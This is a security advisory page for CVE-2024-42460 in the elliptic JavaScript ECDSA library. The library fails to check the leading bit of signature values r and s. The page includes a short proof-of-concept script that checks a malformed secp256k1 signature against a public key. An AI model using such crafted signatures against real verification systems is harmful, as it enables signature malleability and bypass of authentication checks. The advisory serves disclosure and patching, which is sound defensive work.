Improper Verification of Cryptographic Signature Affecting org.webjars.npm:elliptic package, versions [0,]


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.04% (11th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JAVA-ORGWEBJARSNPM-7707764
  • published19 Aug 2024
  • disclosed2 Aug 2024
  • creditMarkus Schiffermüller

Introduced: 2 Aug 2024

CVE-2024-42460  (opens in a new tab)
CWE-347  (opens in a new tab)

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

org.webjars.npm:elliptic is a Fast elliptic-curve cryptography in a plain javascript implementation.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to a missing check for whether the leading bit of r and s is zero. An attacker can manipulate the ECDSA signature by exploiting this oversight.

PoC

var elliptic = require('elliptic'); // tested with version 6.5.6
var hash = require('hash.js');
var toArray = elliptic.utils.toArray;

var ec = new elliptic.ec('secp256k1');

// [tcId 6] Legacy: ASN encoding of r misses leading 0
var msg = '313233343030';
var sig = '30440220813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba';
var pk = '04b838ff44e5bc177bf21189d0766082fc9d843226887fc9760371100b7ee20a6ff0c9d75bfba7b31a6bca1974496eeb56de357071955d83c4b1badaa0b21832e9';

var hashMsg = hash.sha256().update(toArray(msg, 'hex')).digest();
var pubKey = ec.keyFromPublic(pk, 'hex');
console.log('Valid signature: ' + pubKey.verify(hashMsg, sig));

CVSS Scores

version 4.0
version 3.1